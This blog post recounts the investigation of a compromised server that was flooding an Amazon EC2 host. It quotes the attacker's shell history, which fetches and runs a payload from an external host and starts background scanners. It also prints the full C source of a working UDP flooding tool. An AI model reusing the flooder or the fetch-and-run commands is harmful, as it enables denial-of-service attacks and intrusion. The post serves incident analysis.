Monday, April 23, 2012

The server got used as a jump box again........


The first thing I usually do when I get to the office is open a browser and surf the web (kidding), and today was no exception. Except... hmm, the network seemed to be down today; nothing could get out. I connected to the server and had a look: pinging Google's DNS server didn't respond either. Looked like the network was dead, so I went and had breakfast first...... (kidding again)

While eating breakfast and idly staring at the screen, I suddenly noticed that the pings actually were getting through; they were just dropping packets badly. Normally, no matter how slow the network is, at most the ping times get longer. I had never seen packet loss this heavy. Section Chief Li furrowed his brow and realized the case was not so simple......

$ ping 8.8.8.8
PING 8.8.8.8 (8.8.8.8) 56(84) bytes of data.
64 bytes from 8.8.8.8: icmp_req=3 ttl=48 time=37.7 ms
64 bytes from 8.8.8.8: icmp_req=16 ttl=48 time=38.7 ms
64 bytes from 8.8.8.8: icmp_req=28 ttl=48 time=36.2 ms
64 bytes from 8.8.8.8: icmp_req=44 ttl=48 time=35.7 ms
64 bytes from 8.8.8.8: icmp_req=57 ttl=48 time=36.7 ms
^C
--- 8.8.8.8 ping statistics ---
59 packets transmitted, 5 received, 91% packet loss, time 58352ms
rtt min/avg/max/mdev = 35.782/37.041/38.753/1.091 ms

Since I didn't have root and didn't know what to look at, all I knew was that the TX packet count was enormous, absurdly so. Looking with netstat, this spot seemed odd:
$ netstat -a
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State
udp        0  85760 xx-xxx-xxx-xxx.xx:33998 ec2-23-20-86-95.com:ssh ESTABLISHED

Then a ps, and it really did look odd...
$ ps aux
USER       PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
xxxxxx    2497 22.3  0.0   1712   436 ?        S    04:12  66:10 ./std 23.20.86.95 22
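The two clues above (a connected UDP socket with a huge Send-Q, and a process whose arguments name the same host) can be checked mechanically. The following is an added example, not code from the original post: it parses netstat and ps output (constructed here from the lines quoted above plus a couple of benign rows) and correlates the backed-up UDP socket with the local process aimed at the same IP. The Send-Q threshold and the EC2 reverse-name pattern are assumptions.

```python
import re

# Constructed sample output, modelled on the netstat/ps lines quoted in the post,
# plus benign rows so the filter has something to ignore.
NETSTAT_OUTPUT = """Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State
udp        0  85760 xx-xxx-xxx-xxx.xx:33998 ec2-23-20-86-95.com:ssh ESTABLISHED
udp        0      0 0.0.0.0:bootpc          0.0.0.0:*
tcp        0      0 localhost:postgresql    0.0.0.0:*               LISTEN
"""
PS_OUTPUT = """USER       PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
xxxxxx    2497 22.3  0.0   1712   436 ?        S    04:12  66:10 ./std 23.20.86.95 22
root         1  0.0  0.1  24320  2200 ?        Ss   Apr20   0:01 /sbin/init
"""
SENDQ_THRESHOLD = 4096  # assumed: a connected UDP socket normally drains its Send-Q at once

def suspicious_udp_sockets(netstat_text, threshold=SENDQ_THRESHOLD):
    """(send_q, foreign_address) for connected UDP sockets whose Send-Q is backed up."""
    hits = []
    for line in netstat_text.splitlines():
        f = line.split()
        if len(f) >= 6 and f[0].startswith("udp") and f[5] == "ESTABLISHED" and int(f[2]) >= threshold:
            hits.append((int(f[2]), f[4]))
    return hits

def foreign_to_ip(foreign):
    """Dotted IPv4 from netstat's Foreign Address: a raw address, or an EC2 reverse name
    such as ec2-23-20-86-95.com (netstat truncates the full name); None otherwise."""
    m = (re.match(r"(\d+)\.(\d+)\.(\d+)\.(\d+):", foreign)
         or re.match(r"ec2-(\d+)-(\d+)-(\d+)-(\d+)", foreign))
    return ".".join(m.groups()) if m else None

def processes_targeting(ps_text, ip):
    """(user, pid, command) for ps rows whose command line names the IP."""
    out = []
    for line in ps_text.splitlines()[1:]:
        f = line.split(None, 10)  # 11 columns; COMMAND keeps its own spaces
        if len(f) == 11 and ip in f[10]:
            out.append((f[0], int(f[1]), f[10]))
    return out

def correlate(netstat_text, ps_text):
    """Join each backed-up UDP socket with the local process aimed at the same host."""
    findings = []
    for send_q, foreign in suspicious_udp_sockets(netstat_text):
        ip = foreign_to_ip(foreign)
        procs = processes_targeting(ps_text, ip) if ip else []
        findings.append({"send_q": send_q, "foreign": foreign, "ip": ip, "processes": procs})
    return findings
```

Call correlate() on the constructed strings, or on the real output of `netstat -a` and `ps aux`, and each finding carries the queued byte count, the remote host and the matching process so the PID can be investigated (and its binary preserved) before it is killed.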

Later my senior colleague KH came in to work and immediately looked at that account's .bash_history. Seniors are seniors: he spotted the clue right away:
$ cd xxxxxx
$ cat .bash_history
w
uname -a
cd /tmp
ls -a
cd .ss
ls -a
nohup ./202.231  >>/dev/null &
nohup ./mass 202.231  >>/dev/null &
nohup ./a 202.231  >>/dev/null &

cd /dev/shm
ls -a
cd /dev/shm
ls -a
cd /tmp
ls -a
rm -rf .ss
cd /dev/shm
ls -a
wget lighthd.altervista.org/pid.tgz
tar zxvf pid.tgz
rm -rf pid.tgz
cd poid
]
cd pid
ls -a
rm -rf pid.tgz
ls -a
cd pid
ls -a
./start

As a keyboard Conan, naturally I had to grab pid.tgz and take a look. It had quite a few files in it, shell scripts as well as binaries. Opening the std binary directly in Notepad++, I found this string:
[STD2.C BY STACKD] Syntax: %s host port
So I googled STD2.C BY STACKD and found std's source code. Its usage message matches what ps showed, so it looks like the same program:
/* STD.C By stackd - (root@stackd.net) Define strings to what you feel fit */

#define STD2_STRING "std"
#define STD2_SIZE 50
#include <stdio.h>
#include <stdlib.h>      /* exit(), atoi(): missing from the copy found online */
#include <strings.h>     /* bzero(), bcopy() */
#include <sys/param.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include <stdarg.h>
int echo_connect(char *, short);
/* Resolve the target and return a UDP socket connect()ed to host:port. */
int echo_connect(char *server, short port)
{
   struct sockaddr_in sin;
   struct hostent *hp;
   int thesock;
   hp = gethostbyname(server);
   if (hp==NULL) {
      printf("Unknown host: %s\n",server);
      exit(0);
   }
   printf(" STD.C -- Packeting %s:%d\n ", server, port);
   bzero((char*) &sin,sizeof(sin));
   bcopy(hp->h_addr, (char *) &sin.sin_addr, hp->h_length);
   sin.sin_family = hp->h_addrtype;
   sin.sin_port = htons(port);
   thesock = socket(AF_INET, SOCK_DGRAM, 0);   /* UDP: nothing is ever read back */
   connect(thesock,(struct sockaddr *) &sin, sizeof(sin));
   return thesock;
}
int main(int argc, char **argv)
{
   int s;
   if(argc != 3)
   {
      /* This is the usage string seen inside the std binary above. */
      fprintf(stderr, "[STD2.C BY STACKD] Syntax: %s host port\n",argv[0]);
      exit(0);
   }
   s=echo_connect(argv[1], atoi(argv[2]));
   /* Endless loop with no sleep: send STD2_SIZE (50) bytes forever, which is why
      the process sits at 22% CPU and the socket's Send-Q stays backed up. The
      literal "std" is only 4 bytes, so the other 46 come from adjacent memory. */
   for(;;)
   {
      send(s, STD2_STRING, STD2_SIZE, 0);
   }
   return 0;
}

The program is pretty simple: it just blasts small packets as fast as it can. Judging from the ps output above, it was continuously stuffing small packets at port 22 of 23.20.86.95. I looked this IP up with whois:
OrgName:        Amazon.com, Inc.
OrgId:          AMAZO-4
Address:        Amazon Web Services, Elastic Compute Cloud, EC2
Address:        1200 12th Avenue South
City:           Seattle
StateProv:      WA
PostalCode:     98144
Country:        US
RegDate:        2005-09-29
Updated:        2009-06-02
Comment:        For details of this service please see
Comment:        http://ec2.amazonaws.com/
Ref:            http://whois.arin.net/rest/org/AMAZO-4

Hmm, damn, it's actually Amazon...... Then a look at xxxxxx's last login records:
$ last | grep xxxxxx
xxxxxx   pts/3        adsl-6-227.37-15 Mon Apr 23 03:07 - 03:09  (00:02)
xxxxxx   ssh          adsl-6-227.37-15 Mon Apr 23 03:07 - 03:09  (00:02)

And a whois lookup on that IP:
OrgName:        Headquarters, USAISC
OrgId:          HEADQU-3
Address:        NETC-ANC CONUS TNOSC
City:           Fort Huachuca
StateProv:      AZ
PostalCode:     85613
Country:        US
RegDate:        1990-03-26
Updated:        2011-08-17
Ref:            http://whois.arin.net/rest/org/HEADQU-3

Then I googled Headquarters, USAISC and found this blog post. The Headquarters, USAISC in that post is in Washington, DC, though, while the one my whois query returned is in Arizona. Either way, that box is presumably just another jump box.

That's as far as the keyboard Conan could get today; I don't know what else to look into XD